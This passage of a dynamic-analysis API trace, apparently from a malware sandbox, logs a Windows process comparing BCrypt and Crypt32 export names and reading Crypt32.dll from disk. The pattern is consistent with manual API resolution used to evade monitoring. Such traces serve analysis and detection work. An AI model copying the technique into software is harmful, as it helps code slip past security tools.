lpString2="BCryptConfigureContextFunction") returned 1 [0251.723] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0251.723] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0251.723] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0251.723] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0251.723] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0251.723] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0251.723] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0251.724] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0251.724] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0251.724] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0251.725] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0251.725] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0251.725] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0251.726] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0251.726] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0251.726] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0251.727] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0251.727] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0251.727] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0251.727] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0251.727] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0251.727] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0251.727] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0251.727] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0251.727] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0251.727] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0251.727] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0251.727] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0251.727] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0251.727] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0251.727] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0251.727] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0251.727] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0251.727] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0251.727] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0251.727] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0251.727] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0251.727] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0251.728] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0251.728] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0251.729] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0251.729] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0251.729] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0251.729] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0251.729] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0251.729] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0251.729] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0251.729] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0251.729] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0251.729] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0251.729] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0251.729] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0251.729] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0251.729] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0251.729] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0251.729] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0251.729] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0251.729] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0251.729] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0251.729] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0251.730] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0251.733] GetProcessHeap () returned 0x4e0000 [0251.733] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2d22010 | out: hHeap=0x4e0000) returned 1 [0251.733] GetProcessHeap () returned 0x4e0000 [0251.733] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x10) returned 0x4f92a0 [0251.734] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0251.743] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0251.743] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0251.744] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0251.744] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0251.744] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0251.896] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0251.897] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0251.897] GetProcessHeap () returned 0x4e0000 [0251.897] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x1c30e0) returned 0x40ed040 [0251.910] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0251.910] ReadFile (in: hFile=0x160, lpBuffer=0x40ed040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40ed040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0251.938] CloseHandle (hObject=0x160) returned 1 [0251.938] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0251.939] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0251.939] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0251.939] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0251.939] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0251.939] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0251.939] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0251.939] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0251.939] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0251.939] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0251.939] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0251.939] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0251.939] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0251.939] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0251.939] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0251.939] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0251.939] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0251.939] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0251.939] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0252.069] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0252.069] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0252.069] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0252.069] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0252.069] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0252.069] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0252.069] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0252.069] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.069] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0252.070] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0252.070] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0252.070] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0252.070] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0252.070] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0252.070] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.070] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.070] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0252.070] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0252.070] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0252.070] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0252.070] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0252.070] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0252.070] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.070] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0252.070] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0252.070] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0252.071] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0252.071] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0252.071] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0252.071] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0252.071] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0252.071] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.071] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0252.071] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0252.071] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.071] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0252.071] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0252.071] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0252.071] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0252.071] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0252.071] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0252.071] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.071] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0252.071] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0252.072] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.072] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.072] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0252.072] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0252.072] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0252.072] 